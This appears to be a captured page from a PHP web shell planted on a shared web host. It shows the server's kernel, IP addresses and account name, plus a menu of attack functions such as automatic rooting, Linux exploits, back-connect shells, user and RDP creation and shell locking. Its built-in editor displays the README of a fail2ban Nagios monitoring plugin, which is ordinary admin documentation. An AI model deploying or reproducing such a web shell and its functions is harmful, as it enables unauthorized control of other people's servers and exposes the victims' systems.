Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
fail2ban /
examples /
nagios /
[ HOME SHELL ]
Name
Size
Permission
Action
README
3.23
KB
-rw-r--r--
check_fail2ban
11.26
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
Description ----------- This plugin checks if the fail2ban server is running and how many IPs are currently banned. You can use this plugin to monitor all the jails or just a specific jail. How to use ---------- Just have to run the following command: $ ./check_fail2ban --help If you need to use this script with NRPE you just have to do the following steps: 1 allow your user to run the script with the sudo rights. Just add something like that in your /etc/sudoers (use visudo) : nagios ALL=(ALL) NOPASSWD: /<path-to>/check_fail2ban 2 then just add this kind of line in your NRPE config file : command[check_fail2ban]=/usr/bin/sudo /<path-to>/check_fail2ban 3 don't forget to restart your NRPE daemon /!\ be careful to let no one able to update the check_fail2ban ;) ------------------------------------------------------------------------------ Notes (from f2ban.txt) ----- It seems that Fail2ban is currently not working, please login and check HELP: 1.) stop the Service /etc/init.d/fail2ban stop 2.) delete the socket if available rm /var/run/fail2ban/fail2ban.sock 3.) start the Service /etc/init.d/fail2ban start 4.) check if fail2ban is working fail2ban-client ping Answer should be "pong" 5.) if the answer is not "pong" run away or CRY FOR HELP ;-) Help ---- Usage: /<path-to>/check_fail2ban [-p] [-D "CHECK FAIL2BAN ACTIVITY"] [-v] [-c 2] [-w 1] [-s /<path-to>/socket] [-P /usr/bin/fail2ban-client] Options: -h, --help Print detailed help screen -V, --version Print version information -D, --display=STRING To modify the output display default is "CHECK FAIL2BAN ACTIVITY" -P, --path-fail2ban_client=STRING Specify the path to the tw_cli binary default value is /usr/bin/fail2ban-client -c, --critical=INT Specify a critical threshold default is 2 -w, --warning=INT Specify a warning threshold default is 1 -s, --socket=STRING Specify a socket path default is unset -p, --perfdata If you want to activate the perfdata output -v, --verbose Show details for command-line debugging (Nagios may truncate the output) Example ------- # for a specific jail $ ./check_fail2ban --verbose -p -j ssh -w 1 -c 5 -P /usr/bin/fail2ban-client DEBUG : fail2ban_client_path: /usr/bin/fail2ban-client DEBUG : /usr/bin/fail2ban-client exists and is executable DEBUG : final fail2ban command: /usr/bin/fail2ban-client DEBUG : warning threshold : 1, critical threshold : 5 DEBUG : it seems the connection with the fail2ban server is ok CHECK FAIL2BAN ACTIVITY - OK - 0 current banned IP(s) for the specific jail ssh | currentBannedIP=0 # for all the current jails $ ./check_fail2ban --verbose -p -w 1 -c 5 -P /usr/bin/fail2ban-client DEBUG : fail2ban_client_path: /usr/bin/fail2ban-client DEBUG : /usr/bin/fail2ban-client exists and is executable DEBUG : final fail2ban command: /usr/bin/fail2ban-client DEBUG : warning threshold : 1, critical threshold : 5 DEBUG : it seems the connection with the fail2ban server is ok DEBUG : jails list: apache, ssh-ddos, ssh DEBUG : the jail apache has currently 0 banned IPs DEBUG : the jail ssh-ddos has currently 0 banned IPs DEBUG : the jail ssh has currently 0 banned IPs CHECK FAIL2BAN ACTIVITY - OK - 3 detected jails with 0 current banned IP(s) | currentBannedIP=0
Close
